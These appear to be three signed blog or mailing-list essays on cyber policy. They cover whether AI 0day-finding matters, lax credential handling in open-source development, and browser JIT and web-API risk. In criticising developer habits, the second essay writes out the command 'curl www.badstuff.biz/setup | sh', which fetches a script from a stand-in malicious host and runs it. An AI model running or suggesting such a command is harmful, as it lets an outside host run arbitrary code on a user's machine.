Can a hamster do interprocedural analysis? What size of hamster can turn a
tier-2 geopolitical adversary's cyber force into a tier-1 adversary? Is the
best use of a hamster finding 0day or orchestrating the offensive
operations themselves? These are all great questions for policy teams to
ponder and they pontificate over how to properly regulate AI.
On one hand, as a technologist, your tendency will be to try to explain to
policy teams what makes a scary adversary scary, maybe get involved in
building a taxonomy of various tiers of adversary, start classifying
operations as "sophisticated" and "not sophisticated". This is not useful,
but it feels useful! It is like recycling cardboard boxes, all while
knowing that you, as an organism, are primarily oriented towards boiling
the oceans and turning the planet into Venus as quickly and efficiently as
possible. Remember that today's small stone crab claw is tomorrow's "extra
large" stone crab claw, because all the big ones got eaten and that's
how generational
amnesia
<https://www.natural-solutions.world/blog/how-can-we-stop-we-need-to-work-on…>
works!
In other words, while STORM-0558's operation against Microsoft was slick
like oil across the ever-more-hot waters of the Gulf of Mexico when it
happened, the million teams doing the exact same Active Directory tricks
the next month were just small fish, despite their impact on targets. And
most big-impact operations could have been done by second-tier penetration
testing teams, let alone nation-state adversaries. You will, if you work in
Cyber Policy long enough, see people make tables of operations which
compare various hacks from over the last fifteen years, which is like
comparing the bite strengths of a Cretaceous monster to your average modern
iguana.
Likewise, most of Policy-world is, like we all are, obsessed with 0day. We
like to count them with the enthusiasm of a vampire puppet on a children's
TV show! But we also know that finding 0day is not a sign of sophistication
so much as finding the right 0day at the right time. I don't know how to
classify Orange Tsai's PHP character innovation but because it doesn't fit
neatly into a spreadsheet, it might as well not exist?
"If AI finds 0day, then it must be regulated" is a fun position to take in
the many fancy halls and tedious Zoom calls where a pompous attitude and an
ill-fitting suit are table stakes for attendance and having actually
written code that uses Huggingface is considered bad form. But regulating
technologies that can find 0day is a dead end. The current best way to find
0day is fuzzers and the dumber they are, the better they work most of the
time. When it comes to operations, the current best way to hack is to email
people and ask them for their password? Is that still true? Or do we just
all look through huge databases of usernames and passwords that have
already leaked and just use those now? I'm sure AI can also do that, but
I'm also sure that it doesn't matter.
I try to tell policy people this: What makes a scary adversary is huge
resources, huge motivation, and huge innovation. The big names will
probably use AI to automate different things, but nobody is going to saddle
up some hamsters and suddenly turn from a not-scary adversary into a scary
one.
-dave
People occasionally read my blogposts
<https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are…>on
Jia Tan
<https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>and
then ask me about open source development in general, and you can only, in
your darkest heart of hearts (your only heart) laugh.
The other day I was contributing to a project that I am one of several
developers on. In particular, I wrote a GDB script that traces through a
function, printing out all the various variables and their sizes and this
gets fed into an LLM to try to reason about it, which is a bit like asking
a hedgehog how big a Unicode string should be to fit around the moon, but
it was worth a shot, ya know? I have the kind of dyslexia that means I
can't tell matrix algebra from a thinking conscious creature.
Anyways, while I am good at making GDB dance in particular ways, like
knowing the ancient art of the Polka, I am not good at modern software
development, and barely understand GIT or Docker or Cloud things. But I
have hacked a few things, like ya'll have, and so my development happens in
a VM and that VM has access to pretty much just the source code it needs
and not a whole lot else.
But that's not how modern development works. It's common to see
instructions to run "gcloud auth" and then walk through the web
authentication portal from Google so your current user can access cloud
buckets and APIs while testing or debugging your giant microservice. Like,
people are out there just raw dogging source code from random other open
source developers, with their local environment running tokens that give
them access to everything they could possibly need from their Google
account. People out there running curl www.badstuff.biz/setup | sh. People,
and by this I mean developers, are lost storing five thousand fine grained
GitHub tokens in various text files on their hard drive because they can't
remember which one was which.
In other words: Jia Tan might have been a best case scenario for this
community.
-dave
I know it's in vogue to pick on enterprise hardware marketed to "Secure
your OT Environment" but actually written in crayon in a language made of
all sharp edges like C or PHP, with some modules in Cobol for spice. This
is the "Critical Infrastructure" risk du jour, on a thousand podcasts and
panels, with *Volt Typhoon* in the canary seat, where once only the
"sophisticated threat" Mirai had root permissions.
As embarrassing as having random Iranian teenagers learn how to do systems
administration on random water plants in New Jersey is, it's *more*
humiliating to have systemic vulnerabilities right in front of you, have a
huge amount of government brain matter devoted to solving them, and yet not
make the obvious choice to turn off features that are bleeding us out.
And when you talk about market failure in Security you can't help but talk
about Web Browsers, both mobile and desktop. Web Browsing technology is in
everything - and includes a host of technologies too complicated to go
into, but one of the most interesting has been Just in Time compiling,
which got very popular as an exploitation technique (let's say) in 2010
<http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf> but
since then - for over a decade! - has been a bubbling septic font of
constant systemic, untreated risk.
Proponents of having a JIT in your Javascript compiler say "Without this
kind of performance, you wouldn't be able to have GMail or Expedia!" Which
is not true on today's hardware (Turn on Edge Strict Security mode today
and you won't even notice it), and almost certainly not true on much older
hardware. The issue with JITs is visible to any hacker who has looked at
the code - whenever you have concepts like "Negative Zero
<https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html>"
that have to be gotten perfectly every time or else the attacker gets full
control of your computer, you are in an indefensible space.
I would, in a perfect world, like us to be able to get ahead of systemic
problems. We have a rallying cry and a lot of signatories on a pledge, but
we need to turn it into clicky clicking on the configuration options that
turn these things off on a USG and Enterprise level, the same way we banned
Russian antivirus from having Ring0 in our enterprises, or suspiciously
cheap subsidized Chinese telecom boxes from serving all the phone companies
across the midwest.
The issue with web browsers is not limited to JITs. A Secure By Design
approach to web browsing would mean that most sites would not have access
to large parts of the web browsing specification. We don't need to be
tracked by every website. They don't all need access to Geolocation or
Video or Web Assembly or any number of other parts of the things our web
browsers give them, largely in order to allow the mass production of
targeted advertising.
If we've learned anything in the last decade, it is that the key phrase in
Targeted Advertising is "Targeted", and malware authors have known this for
as long as the ecosystem existed. The reason your browser is insecure by
default is to support a parasitic advertising ecology, enhancing
shareholder value, but leaving our society defenceless against anyone
schooled enough in the dark arts.
Google's current solution to vulnerabilities in the browser is Yet Another
Sandbox. These work for a while until they don't - over time, digital
sandboxes get dirty and filled with secrets just like the one in your
backyard gets filled with presents from the local feral cat community. I
know Project Zero's Samuel Groß is better at browser hacking than I am, and
he personally designed the sandbox, but I look out across the landscape of
the Chinese hacking community and see only hungry vorpal blades and I do
not think it is a winning strategy.
-dave
References:
1. Microsoft's Strict mode turns the JIT off (kudos to Johnathan Norman)
https://support.microsoft.com/en-us/microsoft-edge/enhance-your-security-on…
2. The Sandbox: https://v8.dev/blog/sandbox